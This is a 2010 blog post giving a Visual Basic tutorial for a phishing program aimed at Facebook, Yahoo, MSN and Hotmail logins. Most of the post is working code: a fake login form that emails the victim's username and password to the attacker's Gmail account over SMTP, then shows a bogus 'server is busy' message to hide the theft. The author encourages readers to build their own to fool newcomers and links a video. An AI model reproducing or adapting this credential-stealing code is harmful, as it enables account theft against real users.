Sabtu, 29 Mei 2010

making Hack yahoo, MSN, facebook or anyone by Phishing video tuts


PROOFs



IN THIS VIDEO TUTORIAL I BE MAKING A FACE BOOK HACK USING VISUAL BASIC 2008,YOU CAN DO IT FOR YAHOO. MSN OR HOT-MAIL OR ANYTHING U LIKE... ALL YOU NEED IS VISUAL BASIC SOFTWARE AND THIS VB CODE JUST FOLLOW THE VIDEO TUTORIAL AND MAKE A WHATEVER PUSHING U LIKE

Code:

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("YOUR EMAIL HERE", "YOUR PW HERE")
'using gmail
Dim smtp As New System.Net.Mail.SmtpClient
smtpServer.Port = 587
smtp.EnableSsl = True
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("YOUR EMAIL HERE")
mail.To.Add("YOUR EMAIL HERE")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("server is busy, Please try again later! visit www.y-socks.net/vb for more information")


ABOVE THE FORM.VB

CODE:
Imports System.Net.Mail


I FORGOT TO DO THIS IN TUTORIAL DOUBLE THE BUTTON 2 AND TYPE THIS

CODE:

Close ()

Msg for newbies Phishing is a method of hacking it's more like cheating lot of noobs caught to this kind of Phishing go head and make one yourselves it's not so hard


http://rapidshare.com/files/346651314/pushing.avi